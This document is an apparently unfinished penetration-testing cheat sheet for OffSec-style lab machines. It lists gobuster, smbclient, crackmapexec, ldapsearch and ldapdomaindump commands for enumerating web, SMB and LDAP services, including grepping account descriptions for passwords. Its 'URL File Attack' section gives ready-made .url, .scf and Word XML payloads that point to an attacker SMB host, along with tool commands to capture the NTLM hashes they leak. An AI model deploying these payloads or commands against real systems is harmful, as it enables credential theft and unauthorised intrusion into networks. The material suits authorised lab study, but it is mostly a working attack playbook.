Still in Progress
Web Enumeration
export URL="http://192.168.231.55/"
Directory Enumeration
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -k -t 30
File Enumeration
gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -k -t 30
SMB Enumeration
Null sessions on SMB
crackmapexec smb 10.10.10.1 -u '' -p ''
smbclient -L //10.10.10.1 --no-pass
smbclient -N -L \\\\10.10.10.1\\
smbclient //10.10.10.1/folder --no-pass
smbmap -H 10.10.10.1 -u null -p ""
With Credentials
smbclient //10.10.10.1/'File Share' -U fileshare%'password1'
LDAP Enumeration
nmap --script "ldap* and not brute" 192.168.216.165 -p 389 -v -Pn -sT
nmap -n -sV --script "ldap* and not brute" <IP>
ldapsearch -x -H ldap://192.168.216.165 -b “dc=heist,DC=offsec”
Find the domain name of the machine.
ldapsearch -v -x -b "DC=hutch,DC=offsec" -H "ldap://192.168.197.122" "(objectclass=*)"
Just account name.
ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep sAMAccountName
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victime,dc=local" "objectclass=user" sAMAccountName | grep sAMAccountName | awk -F ": " '{print $2}'
Account name and description (may contain passwords)
ldapsearch -v -x -b "DC=victim,DC=local" -H "ldap://192.168.216.165" "(objectclass=*)" | grep -e sAMAccountName -e description
ldapsearch -x -H "ldap://192.168.197.122" -b "dc=victim,dc=local" "objectclass=user" sAMAccountName description | grep -e sAMAccountName -e description | awk -F ": " '{print $2}'
LDAPDOMAIN DUMP
With Credentials
ldapdomaindump -u security.local\\<User> -p '<Password>' ldap://<IP>
Without credentials
ldapdomaindump ldap://192.168.216.165
URL File Attack
cme smb 10.10.10.225 -d victim.loca -u user -p 'password!' -M slinky -o NAME=test SERVER=10.8.0.2
https://github.com/overgrowncarrot1/SMBKiller/blob/main/SMBKiller.py
python3 SMB_Killer.py -l 192.168.45.224 -i tun0 -r 192.168.204.30 -a 'DocumentsShare' -A
@evil.url
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.45.214\%USERNAME%.icon
IconIndex=1
@evil.scf
[Shell]
Command=2
IconFile=\\192.168.45.214\tools\nc.ico
[Taskbar]
Command=ToggleDesktop
@evil.xml
("<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
"
"<?mso-application progid='Word.Document'?>
"
"<?xml-stylesheet type='text/xsl' href='\\192.168.45.214\evil.xsl' ?>")
Alternative
https://github.com/Greenwolf/ntlm_theft
For .lnk files
https://github.com/xct/hashgrab
python3 ~/tools/hashgrab/hashgrab.py 10.9.1.18 xct
impacket-smbserver share share -smb2support
put @xct.lnk